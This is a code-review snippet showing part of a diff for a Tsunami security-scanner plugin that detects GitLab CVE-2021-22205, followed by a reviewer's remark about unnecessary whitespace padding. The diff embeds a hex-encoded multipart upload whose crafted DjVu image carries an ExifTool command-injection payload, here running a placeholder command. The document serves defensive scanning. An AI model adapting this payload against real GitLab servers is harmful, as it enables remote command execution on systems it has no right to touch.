community/detectors/gitlab_cve_2021_22205/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202122205/Cve202122205VulnDetector.java

```diff
@@ -0,0 +1,269 @@
+          + "GitLab was not properly validating image files that were passed to a file parser which"
+          + " resulted in a remote command execution.";
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static final String USER_SIGN_PATH = "users/sign_in";
+  private static final String VUL_PATH = "uploads/user";
+  private static final String CSRF_TOKEN = "csrf_token";
+  private static final Pattern CSRF_TOKEN_PATTERN =
+      Pattern.compile("csrf-token\" content=\"(.*?)\" />\\n\\n<meta");
+  /**
+   * The detailed principle of Poc generation for the vulnerability can be found in the following
+   * article devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
+   * https://github.com/mr-r3bot/Gitlab-CVE-2021-22205 I generated a Poc locally, executed the
+   * command TSUNAMI_SCANNER (placeholder), and then converted the PoC to hexadecimal. When sending
+   * data, I only need to convert the hexadecimal code to a string.
+   */
+  private static final String POST_DATA =
+      "0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F"
+          + "6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B20"
+          + "66696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A70"
+          + "65670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFF"
+          + "DEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A"
+          + "5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666"
+          + "004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F42473434"
+          + "00000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F707972"
+          + "6967687420225C0A22202E2071787B5453554e414d495f5343414e4e45527D202E205C0A22206220222920"
+          + "29202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020202020202020202020"
+          + "20202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D"
```

Comment:
These consecutive whitespaces (hex code `20`) do not seem to be necessary for the payload.